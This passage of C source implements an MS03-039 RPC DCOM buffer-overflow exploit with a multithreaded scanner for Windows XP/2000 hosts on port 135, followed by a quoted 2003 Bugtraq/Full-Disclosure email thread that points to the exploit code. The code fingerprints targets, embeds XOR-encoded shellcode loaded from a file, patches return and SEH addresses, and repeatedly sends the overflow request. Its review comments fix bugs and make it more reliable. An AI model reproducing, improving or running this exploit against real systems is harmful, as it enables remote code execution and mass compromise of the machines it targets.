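    0x9f, 0xe8, 0x08, 0x00,
    0x2b, 0x10, 0x48, 0x60,
    0x02, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00,
    0x04, 0x5d, 0x88, 0x8a,
    0xeb, 0x1c, 0xc9, 0x11,
    0x9f, 0xe8, 0x08, 0x00,
    0x2b, 0x10, 0x48, 0x60,
    0x02, 0x00, 0x00, 0x00};
    */

    fd_set fds2;
    unsigned char buf[1024];   /* receive sink; contents are never examined */
    int l;
    struct timeval tv2;

    (void)ip;
    memset(buf, '\0', sizeof(buf));

    if (send(sock, (const char *)peer0_0, sizeof(peer0_0), 0) == SOCKET_ERROR) {
        closesocket(sock);
        return -1;
    }
    FD_ZERO(&fds2);
    FD_SET(sock, &fds2);
    tv2.tv_sec = 6;
    tv2.tv_usec = 0;
    if (select(sock + 1, &fds2, NULL, NULL, &tv2) <= 0) {
        closesocket(sock);
        return -1;            /* no reply to the first PDU: unknown */
    }
    l = recv(sock, (char *)buf, sizeof(buf), 0);   /* result ignored, as in the original */

    if (send(sock, (const char *)peer0_1, sizeof(peer0_1), 0) == SOCKET_ERROR) {
        closesocket(sock);
        return -1;
    }
    /* Re-arm the descriptor set and timeout: select() rewrites both. */
    FD_ZERO(&fds2);
    FD_SET(sock, &fds2);
    tv2.tv_sec = 6;
    tv2.tv_usec = 0;
    if (select(sock + 1, &fds2, NULL, NULL, &tv2) <= 0) {
        closesocket(sock);    /* the archived listing returned here without closing */
        return -1;
    }
    memset(buf, '\0', sizeof(buf));
    l = recv(sock, (char *)buf, sizeof(buf), 0);
    closesocket(sock);
    /* 32-byte reply -> WinXP; anything else -> Win2K by default (NT4 not handled). */
    return (l == 32) ? 1 : 0;
}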
/********************************************************************************/ 
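/*
 * Build and (optionally) deliver the MS03-039 overflow request to one host.
 *
 * Original credits, from the banner the listing had commented out: the RPC
 * DCOM overflow was discovered by NSFOCUS; code by FlashSky (xfocus.org).
 *
 * ip1:   dotted-quad target address (copied; at most 199 characters used).
 * atack: non-zero = send the exploit; zero = only fingerprint the host and
 *        log "<os> <ip>" to fp1 (scan mode, see ThreadProc/main).
 * Returns 0 on any failure (socket, connect, bad address, missing "bshell2",
 *         send/recv error) and 1 after the scan-mode log line is written.
 *         In attack mode the send loop only ends when send() fails, so that
 *         mode always returns 0 - exactly as the archived `while(1)` did.
 *
 * Packet assembly (everything below is what this function itself does; the
 * meaning of the individual fields is not documented in the listing):
 *   buf2 = request1 | request2 | rawData(1036) | request3 | request4
 *   rawData = rawData1, then: the bytes of the file "bshell2" copied in at
 *   0x71 and XORed with 0x99; target_os[vers].heap at 0x71+0x1e; the bshell2
 *   size as a 16-bit value at 0x62; target_os[vers].jmp/seh at 0x22a/0x22e.
 *   The two DWORDs of request2 are bumped by sizeof(rawData)/2 and the DWORDs
 *   at offsets 0x8, 0x10, 0x80, 0x84, 0xb4, 0xb8, 0xd0, 0x18c of request1 by
 *   sizeof(rawData)-0xc. The DWORD/WORD stores are unaligned; fine on x86.
 *
 * vers = !version(): version() returns 1 (XP), 0 (2K) or -1 (unknown), so
 * "unknown" selects target_os[0] = WinXP. version() closes the socket it is
 * given on every path; it is therefore not closed again here (the archived
 * listing did, which with many scanner threads alive can close a handle
 * number that has since been reused by another thread).
 *
 * Fixes against the archived listing: `shellcode[i]` subscript restored (the
 * renderer stripped it); fopen("bshell2") result checked (was a NULL deref);
 * the copy into rawData is bounded - rawData is 1036 bytes and the old fread
 * of up to 1024 bytes placed at 0x71 could write 101 bytes past it; strcpy
 * into ip[200] bounded; inet_addr/socket/connect/recv results checked;
 * request2 is patched in the buf2 copy rather than in the global (the global
 * accumulated +518 per call); the function returns on every path (it fell off
 * the end); fp1 is NULL in this listing, so stdout is used when it is.
 */
int attack(char *ip1, bool atack)
{
    unsigned char rawData[1036];
    memcpy(rawData, rawData1, sizeof(rawData));   /* rawData1 is exactly this long incl. its NUL */
    unsigned char shellcode[50000];
    char ip[200];
    snprintf(ip, sizeof(ip), "%s", ip1);
    SOCKET sock;
    int len, len1;
    SOCKADDR_IN addr_in;
    short port = 135;                  /* DCE/RPC endpoint mapper */
    unsigned char buf1[50000];
    unsigned char buf2[50000];
    FILE *out = fp1 ? fp1 : stdout;

    printf("%s\n", ip);

    addr_in.sin_family = AF_INET;
    addr_in.sin_port = htons(port);
    addr_in.sin_addr.S_un.S_addr = inet_addr(ip);
    if (addr_in.sin_addr.S_un.S_addr == INADDR_NONE) {
        printf("%s - bad address\n", ip);
        return 0;
    }

    if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) {
        printf("Socket failed.Error:%d\n", WSAGetLastError());
        return 0;
    }
    len1 = sizeof(request1);
    len = sizeof(rawData);

    if (WSAConnect(sock, (struct sockaddr *)&addr_in, sizeof(addr_in),
                   NULL, NULL, NULL, NULL) == SOCKET_ERROR) {
        printf("%s - connect failed\n", ip);
        closesocket(sock);
        return 0;
    }

    /* version() owns `sock` from here on and closes it itself. */
    int vers = !version(ip, sock);

    /* External payload: raw bytes of the file "bshell2" in the working
     * directory. Only sizeof(rawData) - 0x71 = 923 bytes fit between 0x71 and
     * the end of rawData; the original read up to 1024 and could overrun. */
    FILE *fp = fopen("bshell2", "rb");
    if (fp == NULL) {
        printf("%s - cannot open bshell2\n", ip);
        return 0;
    }
    int sz = (int)fread(shellcode, 1, sizeof(rawData) - 0x71, fp);
    fclose(fp);
    for (int i = 0; i < sz; i++)
        rawData[i + 0x71] = shellcode[i];

    /* Per-target heap address, stored inside the payload region before it is
     * encoded (the original commented this region in Russian; text lost). */
    *(DWORD *)(rawData + 0x71 + 0x1e) = target_os[vers].heap;
    /* Encode the payload; the stub bytes in rawData1 carry the same 0x99. */
    XOR(rawData, 0x71, sz, 0x99);
    /* Per-target SEH / jmp values (see the comments on rawData1 and target_os). */
    DWORD seh = target_os[vers].seh;
    DWORD jmp = target_os[vers].jmp;
    *(DWORD *)(rawData + 0x22a) = jmp;
    *(DWORD *)(rawData + 0x22e) = seh;
    *(WORD *)(rawData + 0x62) = (WORD)sz;

    /* Assemble buf2 = request1 | request2 | rawData | request3 | request4. */
    memcpy(buf2, request1, sizeof(request1));

    memcpy(buf2 + len1, request2, sizeof(request2));
    /* Patch the copy, not the global request2. */
    *(DWORD *)(buf2 + len1) += (DWORD)(sizeof(rawData) / 2);
    *(DWORD *)(buf2 + len1 + 8) += (DWORD)(sizeof(rawData) / 2);
    len1 += sizeof(request2);

    memcpy(buf2 + len1, rawData, sizeof(rawData));
    len1 += sizeof(rawData);

    memcpy(buf2 + len1, request3, sizeof(request3));
    len1 += sizeof(request3);
    memcpy(buf2 + len1, request4, sizeof(request4));
    len1 += sizeof(request4);

    /* Length fields inside the request1 part that must account for rawData. */
    static const int fixups[] = { 0x8, 0x10, 0x80, 0x84, 0xb4, 0xb8, 0xd0, 0x18c };
    for (size_t k = 0; k < sizeof(fixups) / sizeof(fixups[0]); k++)
        *(DWORD *)(buf2 + fixups[k]) += (DWORD)(len - 0xc);

    if (!atack) {
        /* Scan mode: just record the fingerprint. */
        fprintf(out, "%s %s\n", target_os[vers].target, ip);
        return 1;
    }

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == INVALID_SOCKET) {
        printf("Socket failed.Error:%d\n", WSAGetLastError());
        return 0;
    }
    if (WSAConnect(sock, (struct sockaddr *)&addr_in, sizeof(addr_in),
                   NULL, NULL, NULL, NULL) == SOCKET_ERROR) {
        printf("%s - connect failed\n", ip);
        closesocket(sock);
        return 0;
    }

    if (send(sock, (const char *)bindstr, sizeof(bindstr), 0) == SOCKET_ERROR) {
        printf("%s - send failed %d\n", ip, WSAGetLastError());
        closesocket(sock);
        return 0;
    }
    printf("%s - send exploit to %s\n", ip, target_os[vers].target);

    /* Wait for the reply to bindstr; its contents are not examined. */
    int got = recv(sock, (char *)buf1, 1000, 0);
    if (got <= 0) {
        printf("%s - no bind reply\n", ip);
        closesocket(sock);
        return 0;
    }

    /* Resend the same request until the connection breaks - this is what the
     * archived `while(1)` did; the send/closesocket that followed it there
     * were unreachable. */
    int i = 0;
    for (;;) {
        if (send(sock, (const char *)buf2, len1, 0) == SOCKET_ERROR) {
            printf("\nSend failed.Error:%d\n", WSAGetLastError());
            closesocket(sock);
            return 0;
        }
        printf("\r%d", ++i);
    }
}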
/* Number of ThreadProc workers currently inside attack(); main() throttles on it.
 * NOTE(review): in the archived listing it is updated with plain ++/-- from
 * every worker thread, which is a data race. */
unsigned long thread_count=0; 
/* Address of the host the most recently created worker should scan. Shared:
 * main() sprintf()s the next host into it and ThreadProc reads it; the
 * Sleep(10) in main() is the only thing separating the two. */
char adr[200]; 

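/*
 * Scan-mode worker: fingerprint one host and log it (attack(target, 0)).
 *
 * lpParameter: if it points to a non-empty C string it is used as the target
 *   address; otherwise (main() in this listing passes "") the address is read
 *   from the global `adr`. Either way it is copied to a local buffer as the
 *   very first thing, because main() overwrites `adr` for the next host and
 *   only a Sleep(10) keeps that write from racing this read.
 * thread_count is incremented around the attack() call so main() can throttle
 * the number of live workers. The original used plain ++/-- on the shared
 * counter from many threads (a data race); the Interlocked* routines from
 * windows.h (already included) are used instead.
 * Returns 0 (thread exit code; nothing reads it).
 */
DWORD WINAPI ThreadProc(
LPVOID lpParameter   // thread data
)
{
    char target[sizeof(adr)];
    const char *src = (const char *)lpParameter;
    if (src == NULL || src[0] == '\0')
        src = adr;
    snprintf(target, sizeof(target), "%s", src);

    InterlockedIncrement((volatile LONG *)&thread_count);
    attack(target, 0);
    InterlockedDecrement((volatile LONG *)&thread_count);
    return 0;
}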

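/*
 * Entry point. Two modes, chosen by whether argv[1] contains a '.':
 *   prog a.b.c.d              attack that single host (attack(ip, 1)), then
 *                             sleep 20 s before exiting;
 *   prog A B C D T            scan mode: for c in [C,255) and d in [D,255),
 *                             fingerprint A.B.c.d on a worker thread
 *                             (attack(ip, 0)) while keeping at most T workers
 *                             busy; results are written to fp1.
 * Returns 0 normally, 1 on a usage error or if Winsock cannot be initialised.
 *
 * Fixes against the archived listing: `void main` -> `int main`; argv is
 * checked against argc before use (scan mode read argv[5] unconditionally);
 * the sprintf into adr[200] is bounded; the thread handle returned by
 * CreateThread is closed (it leaked one handle per host); fp1 is never
 * opened anywhere in this listing, so it is pointed at stdout rather than
 * letting fprintf()/fclose() run on NULL. Kept as the original wrote them and
 * only noted here: the global `adr` shared with ThreadProc (the Sleep(10)
 * after CreateThread is what keeps the next sprintf from racing the new
 * thread's read of it), and the inner loop restarting at D on every outer
 * iteration rather than only the first.
 */
int main(int argc, char **argv)
{
    WSADATA wsaData;
    int wVersionRequested = MAKEWORD(2, 2);

    int err = WSAStartup(wVersionRequested, &wsaData);
    if (err != 0) {
        /* Could not find a usable WinSock DLL. */
        return 1;
    }

    if (argc < 2) {
        printf("%s targetIP\n%s A B C D maxthreads\n", argv[0], argv[0]);
        WSACleanup();
        return 1;
    }
    if (fp1 == NULL)
        fp1 = stdout;

    if (strchr(argv[1], '.')) {
        attack(argv[1], 1);
        Sleep(20000);
        WSACleanup();
        return 0;
    }

    if (argc < 6) {
        printf("%s A B C D maxthreads\n", argv[0]);
        WSACleanup();
        return 1;
    }
    int cb = atoi(argv[3]);
    int db = atoi(argv[4]);
    long tm = atoi(argv[5]);
    for (int c = cb; c < 255; c++) {
        for (int d = db; d < 255; d++) {
            snprintf(adr, sizeof(adr), "%s.%s.%d.%d", argv[1], argv[2], c, d);
            /* Throttle: wait until fewer than tm workers are running. */
            while ((long)thread_count > tm)
                Sleep(100);
            HANDLE h = CreateThread(NULL, 0, &ThreadProc, "", 0, NULL);
            if (h != NULL)
                CloseHandle(h);   /* does not stop the thread; just drops the handle */
            Sleep(10);            /* gives the worker time to copy adr before it changes */
            fflush(fp1);
        }
    }
    Sleep(60000);                 /* crude wait for the last workers, as in the original */
    if (fp1 != stdout)
        fclose(fp1);
    else
        fflush(fp1);
    WSACleanup();
    return 0;
}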

Bobby

-----Original Message-----
From: Alex [mailto:pk95 () yandex ru]
Sent: Friday, October 10, 2003 1:09 PM
To: bugtraq () securityfocus com; full-disclosure () lists netsys com;
NTBUGTRAQ () LISTSERV NTBUGTRAQ COM
Cc: Secure () microsoft com
Subject: [Full-disclosure] Re: Bad news on RPC DCOM vulnerability


Exploit code can be found here:
http://www.securitylab.ru/40754.html

This code works even against systems with all security fixes installed. It is very dangerous.

----- Original Message ----- 
From: "3APA3A" <3APA3A () SECURITY NNOV RU>
To: <bugtraq () securityfocus com>; <full-disclosure () lists netsys com>;
<NTBUGTRAQ () LISTSERV NTBUGTRAQ COM>
Cc: <Secure () microsoft com>
Sent: Friday, October 10, 2003 6:48 PM
Subject: Bad news on RPC DCOM vulnerability


Dear bugtraq () securityfocus com,

There is some bad news on the RPC DCOM vulnerability:

1.  A universal exploit for MS03-039 exists in the wild; PINK FLOYD is
topical again.
2.  The exploit author reported (and it was confirmed) that Windows XP SP1
with all security fixes installed is still vulnerable to a variant of the
same bug. Windows 2000/2003 were not tested. For now only a DoS exploit
exists, but code execution is probably possible. Technical details have been
sent to Microsoft; we are waiting for confirmation.

Dear ISPs: please instruct your customers to enable the personal firewall in
Windows XP.

-- 
http://www.security.nnov.ru
         /\_/\
        { , . }     |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   }
+-------------o66o--+ /
                    |/
You know my name - look up my number (The Beatles)





This message (including any attachments) contains confidential information
intended for a specific individual and purpose, and is protected by law.  If
you are not the intended recipient, you should delete this message.  Any
disclosure, copying, or distribution of this message, or the taking of any
action based on it, is strictly prohibited.



